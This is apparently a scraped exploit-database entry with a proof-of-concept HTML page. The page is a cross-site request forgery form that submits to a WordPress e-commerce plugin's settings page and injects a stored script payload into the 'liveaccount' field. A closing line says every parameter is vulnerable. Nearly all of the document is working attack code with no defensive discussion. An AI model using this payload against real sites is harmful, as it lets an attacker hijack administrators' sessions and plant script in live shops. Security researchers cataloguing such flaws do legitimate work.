Share
## https://sploitus.com/exploit?id=WPEX-ID:4127B76C-4E4B-483B-8905-B5CA6D24337D
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=wp-ecommerce-settings" method="POST">
<input type="hidden" name="language" value="3" />
<input type="hidden" name="currency" value="25" />
<input type="hidden" name="liveaccount" value="'><script>alert(/XSS/)</script>" />
<input type="hidden" name="sandboxaccount" value="">" />
<input type="hidden" name="mode" value="2" />
<input type="hidden" name="paymentaction" value="1" />
<input type="hidden" name="size" value="2" />
<input type="hidden" name="opens" value="2" />
<input type="hidden" name="cancel" value="">" />
<input type="hidden" name="return" value="">" />
<input type="hidden" name="update" value="" />
<input type="hidden" name="btn2" value="Save Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
All parameters are affected, such as sandboxaccount etc